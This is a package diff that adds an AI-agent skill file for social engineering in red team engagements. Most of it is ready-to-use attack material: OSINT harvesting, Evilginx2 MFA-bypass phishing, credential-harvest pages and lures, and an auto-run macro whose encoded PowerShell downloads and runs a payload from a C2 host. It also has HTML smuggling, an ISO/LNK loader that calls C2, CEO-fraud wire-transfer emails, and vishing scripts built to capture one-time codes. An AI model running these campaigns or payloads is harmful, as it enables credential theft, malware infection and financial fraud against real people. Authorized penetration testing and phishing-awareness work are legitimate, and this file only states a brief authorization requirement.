rtexit-method 0.1.2 → 0.1.4

package/packaged-assets/.agents/skills/rt-social-engineering/SKILL.md

@@ -0,0 +1,401 @@
+---
+name: rt-social-engineering
+description: "Social engineering master skill for authorized red team engagements. Phishing lure crafting (HTML clone, credential harvest, macro payloads), spear phishing with OSINT targeting, email spoofing and DMARC bypass, BEC (Business Email Compromise) chain development, vishing scripts with pretext development, pretexting for physical access, and GoPhish campaign setup. Use when the engagement scope includes human-factor testing."
+---
+
+# rt-social-engineering — Social Engineering Master Skill
+
+## Overview
+
+Social engineering is exploiting human psychology rather than technical vulnerabilities. In red team engagements, it is often the fastest path to initial access — a single clicked link bypasses years of perimeter hardening. This skill covers end-to-end social engineering campaign planning, execution, and documentation.
+
+**Covers:**
+- Phishing (email-based credential harvest and payload delivery)
+- Spear Phishing (targeted, OSINT-driven)
+- Business Email Compromise (BEC)
+- Vishing (phone-based)
+- Smishing (SMS-based)
+- Pretexting for physical access
+- Campaign infrastructure setup (GoPhish, Evilginx2, Modlishka)
+
+**Authorization note:** Every technique here requires explicit written scope. ROE must specify: allowed targets, allowed domains, allowed lure types, and notification procedures if a target reports the test.
+
+---
+
+## Phase 1 — Target Profiling (OSINT-Driven)
+
+Before crafting any lure, build the target profile.
+
+```bash
+# Email harvesting — find employee emails
+theHarvester -d corp.com -l 500 -b google,bing,linkedin,hunter
+# Cross-reference with LinkedIn
+python3 linkedin2username.py -u 'attacker@gmail.com' -c 'Target Company' -n 5
+
+# Find org chart structure (who reports to who)
+# LinkedIn advanced search → "Target Company" → filter by department
+# Identify: IT admins, finance team, executives, HR
+
+# Find names + email format
+curl "https://hunter.io/api/v2/domain-search?domain=corp.com&api_key=KEY"
+# Reveals: {first}.{last}@corp.com or {first}{last}@corp.com
+
+# Find recent news / events (pretext material)
+site:corp.com filetype:pdf OR filetype:docx  # leaked documents
+site:linkedin.com "Target Company" "we are hiring"  # hiring events = IT changes
+"Target Company" "new office" OR "system migration" OR "security update"  # pretext hooks
+```
+
+---
+
+## Phase 2 — Infrastructure Setup
+
+### 2a — Domain Setup (Lookalike / Typosquatting)
+
+```bash
+# Find available typosquats
+dnstwist corp.com --format csv | head -20
+# Examples: c0rp.com, corp-security.com, corp-helpdesk.com, corpsupport.com
+
+# Register domain (use privacy protection)
+# Set up DNS: A record → phishing server, MX → mail server
+
+# Configure SPF, DKIM, DMARC to appear legitimate
+# SPF: "v=spf1 ip4:YOUR_IP ~all"
+# DKIM: generate keys → add TXT record
+# DMARC: "v=DMARC1; p=none; rua=mailto:you@yourinfra.com"
+# p=none = reports only, no rejection → maximizes delivery
+```
+
+### 2b — GoPhish Campaign Server
+
+```bash
+# Install GoPhish
+wget https://github.com/gophish/gophish/releases/latest/download/gophish-linux-64bit.zip
+unzip gophish-linux-64bit.zip && chmod +x gophish
+
+# Edit config.json
+{
+  "admin_server": {"listen_url": "127.0.0.1:3333", "use_tls": true},
+  "phish_server": {"listen_url": "0.0.0.0:443", "use_tls": true,
+                   "cert_path": "/etc/letsencrypt/live/corp-helpdesk.com/fullchain.pem",
+                   "key_path":  "/etc/letsencrypt/live/corp-helpdesk.com/privkey.pem"}
+}
+
+./gophish &
+# Access admin: https://127.0.0.1:3333 (SSH tunnel if needed)
+```
+
+### 2c — Evilginx2 (Reverse Proxy Phishing — Bypasses MFA)
+
+```bash
+# Evilginx2 captures session cookies even with MFA enabled
+git clone https://github.com/kgretzky/evilginx2
+cd evilginx2 && go build
+
+./evilginx2 -p ./phishlets -c /root/.evilginx
+
+# Configure domain
+config domain corp-helpdesk.com
+config ip YOUR_SERVER_IP
+
+# Load phishlet (pre-built for Microsoft 365, Google, etc.)
+phishlets hostname o365 corp-helpdesk.com
+phishlets enable o365
+
+# Create lure
+lures create o365
+lures get-url 0
+# Output: https://corp-helpdesk.com/login → captures session token
+```
+
+---
+
+## Phase 3 — Credential Harvest Phishing
+
+### 3a — Clone Target Login Page
+
+```bash
+# Clone with httrack
+httrack https://corp.com/login -O ./clone/ "+*.corp.com" -v
+
+# Or use SET (Social Engineering Toolkit)
+setoolkit
+# 1) Social Engineering Attacks
+# 2) Website Attack Vectors
+# 3) Credential Harvester Attack Method
+# 2) Site Cloner
+# Enter URL to clone: https://login.microsoftonline.com
+
+# Modify cloned page — redirect credentials to your server
+# In index.html: change form action to your collector endpoint
+```
+
+### 3b — Email Template (Microsoft 365 Password Expiry — High Open Rate)
+
+```
+Subject: [Action Required] Your Microsoft 365 password expires in 24 hours
+
+From: IT-Security <no-reply@corp-helpdesk.com>
+To: victim@corp.com
+
+Dear [First Name],
+
+Your Microsoft 365 account password is scheduled to expire in 24 hours.
+To avoid interruption to your email and Teams access, please update your
+password immediately using the link below:
+
+  ► Update Password Now → https://corp-helpdesk.com/renew
+
+If you have already updated your password, please disregard this message.
+
+IT Security Team
+Corp Technology Services
+```
+
+### 3c — Send Campaign (GoPhish)
+
+```
+GoPhish Setup:
+1. Sending Profile: SMTP relay (SendGrid, Amazon SES, or self-hosted Postfix)
+2. Email Template: paste crafted template, add {{.FirstName}} {{.LastName}} tokens
+3. Landing Page: import cloned login page, capture submitted data
+4. Target Group: import CSV (first,last,email,position)
+5. Campaign: link all 4 → launch → monitor results
+```
+
+---
+
+## Phase 4 — Payload Delivery Phishing
+
+### 4a — Office Macro Payload (VBA)
+
+```vba
+' Word/Excel macro — execute on document open
+Sub AutoOpen()
+    AutoRun
+End Sub
+
+Sub AutoRun()
+    Dim cmd As String
+    cmd = "powershell -WindowStyle Hidden -EncodedCommand " & _
+          "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAEMAMgAvAHMAaABlAGwAbAAuAGUAeABlACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAcwBoAGUAbABsAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA=="
+    Shell "cmd.exe /c " & cmd, vbHide
+End Sub
+```
+
+### 4b — HTML Smuggling (Bypass Email Filters)
+
+```html
+<!-- Payload assembles in browser — not scanned by email gateways -->
+<html><body>
+<script>
+  const b64 = "TVqQAAMAAAAEAAAA...";  // base64 encoded exe
+  const blob = new Blob([Uint8Array.from(atob(b64), c => c.charCodeAt(0))],
+    {type: "application/octet-stream"});
+  const a = document.createElement('a');
+  a.href = URL.createObjectURL(blob);
+  a.download = "Invoice_2026.exe";
+  document.body.appendChild(a);
+  a.click();
+</script>
+<p>Your invoice is downloading...</p>
+</body></html>
+```
+
+### 4c — ISO / LNK File (Modern Delivery — No Mark-of-the-Web)
+
+```bash
+# ISO bypasses MOTW — contents not scanned by Defender
+# Create ISO containing: LNK file + hidden payload
+
+# LNK target:
+# cmd.exe /c start /min powershell -w hidden -c "iwr http://C2/s.exe -o $env:TEMP\s.exe; & $env:TEMP\s.exe"
+
+# Package into ISO
+mkisofs -o invoice.iso ./payload_folder/
+
+# Email as attachment: "Invoice_2026.iso"
+# User double-clicks ISO (mounts it) → sees Invoice.lnk → clicks → payload runs
+```
+
+---
+
+## Phase 5 — Business Email Compromise (BEC)
+
+### 5a — CEO / CFO Fraud Chain
+
+```
+STEP 1 — Reconnaissance
+- Identify CEO name: LinkedIn, company website
+- Identify CFO / Finance Manager: LinkedIn
+- Find CEO email format from OSINT: john.smith@corp.com
+
+STEP 2 — Lookalike email setup
+- Register: john.smith@c0rp.com OR john.smith@corp-int.com
+- Configure reply-to: actual CEO email (to monitor replies)
+
+STEP 3 — Initial contact (CEO → CFO)
+Subject: Confidential — Time Sensitive
+
+Hi Sarah,
+
+I'm currently in a board meeting and need your urgent assistance with a 
+wire transfer. This is related to a confidential acquisition — please do 
+not discuss with anyone else until we speak.
+
+Can you handle a $47,000 transfer today? I'll call you after 3pm to 
+discuss. Please confirm you received this.
+
+John
+
+STEP 4 — Follow-up pressure (if no response)
+Subject: Re: Confidential — Time Sensitive
+
+Sarah, please confirm. The window for this deal closes at 5pm EST.
+The legal team is waiting on our end.
+
+J.
+
+STEP 5 — Wire instructions (after target confirms)
+Provide attacker-controlled bank account details.
+In real engagements: use a controlled test account, document instead.
+```
+
+### 5b — IT Helpdesk Impersonation → Credential Theft
+
+```
+From: it-helpdesk@corp-support.com
+To: employee@corp.com
+Subject: Mandatory Security Update — Action Required by EOD
+
+Hi [Name],
+
+Our security team has detected unusual login activity on your account 
+from an unrecognized device (Windows 11, Chicago, IL).
+
+To secure your account, please verify your identity here:
+https://corp-helpdesk.com/verify  [GoPhish / Evilginx link]
+
+If you did not attempt to log in, your account may be compromised.
+Please act within 2 hours to avoid account suspension.
+
+IT Security — Corp Technology
+```
+
+---
+
+## Phase 6 — Vishing (Phone Social Engineering)
+
+### 6a — IT Helpdesk → Password Reset
+
+```
+PRETEXT: IT Helpdesk calling about security issue
+
+[Script]
+"Hi, this is [Name] from the IT Security team. I'm calling regarding 
+your account — we've flagged some suspicious activity in our monitoring 
+system this morning.
+
+We're seeing failed login attempts from [made-up IP/location]. 
+I need to verify your identity and walk you through a quick security check.
+
+Can you confirm your employee ID for me? ... 
+
+Great. And what email address do you have on file? ...
+
+Perfect. I'm going to send you a verification code right now — 
+can you read that back to me when you receive it?"
+
+[Goal: get MFA OTP code in real-time → log in simultaneously]
+```
+
+### 6b — Finance / Wire Fraud Call
+
+```
+PRETEXT: Executive assistant calling on behalf of CEO
+
+"Hi, this is [Name], executive assistant to [CEO Name]. 
+[CEO] asked me to follow up on an email he sent you earlier today 
+regarding a confidential transaction.
+
+Were you able to review his email? ... He's in meetings all day 
+but wanted to make sure this gets processed before the close of business.
+
+He mentioned he'll approve the transaction code verbally — 
+can I ask what system you use to process wire transfers? ..."
+```
+
+---
+
+## Phase 7 — Pretexting for Physical Access
+
+```
+SCENARIO A — Delivery Person
+Materials: clipboard, package box, high-visibility vest
+Script: "Delivery for [name from LinkedIn] in IT. They asked me to 
+bring it directly up — do you know where the server room is?"
+
+SCENARIO B — IT Contractor
+Materials: polo shirt, laptop bag, printed "work order"
+Script: "Hi, I'm here from [MSP/vendor name from OSINT] to service 
+the [server/network equipment] in rack 3B. I have a work order — 
+can you badge me in? My access card hasn't been provisioned yet."
+
+SCENARIO C — New Employee
+Materials: company-branded printouts, laptop
+Script: "Hi, I just started this week on the [department] team — 
+I'm trying to find my desk. Do you know where [manager name from LinkedIn] sits?"
+```
+
+---
+
+## Campaign Metrics & Reporting
+
+```
+Key metrics to capture:
+- Open rate: emails opened / emails sent
+- Click rate: links clicked / emails opened
+- Credential submission rate: forms submitted / links clicked
+- Payload execution rate: payloads run / payloads delivered
+- Report rate: targets who reported the phish to IT
+
+GoPhish exports CSV with all events.
+Document in rt-finding-document with:
+  - CWE-1021 (Improper Restriction of Rendered UI Layers)
+  - MITRE ATT&CK: T1566 (Phishing), T1598 (Phishing for Info)
+  - Business impact: X% of employees surrendered credentials
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:**
+- GoPhish with cloned Microsoft 365 login page
+- Generic credential harvest campaign
+
+**INTERMEDIATE:**
+- OSINT-driven spear phishing with personalized lures
+- Evilginx2 for MFA bypass
+- ISO/LNK payload delivery
+
+**ADVANCED:**
+- BEC chain (CEO fraud, wire transfer)
+- Vishing + simultaneous MFA capture
+- Multi-stage campaigns (build rapport over days)
+
+**EXPERT:**
+- Combining phishing initial access + physical tailgating
+- Custom implant delivery via HTML smuggling
+- Long-term pretexting (weeks-long persona building)
+
+---
+
+## References
+
+- GoPhish: https://getgophish.com
+- Evilginx2: https://github.com/kgretzky/evilginx2
+- Social Engineering Toolkit: https://github.com/trustedsec/social-engineer-toolkit
+- MITRE ATT&CK T1566: https://attack.mitre.org/techniques/T1566/
+- PayloadsAllTheThings/Phishing: https://github.com/swisskyrepo/PayloadsAllTheThings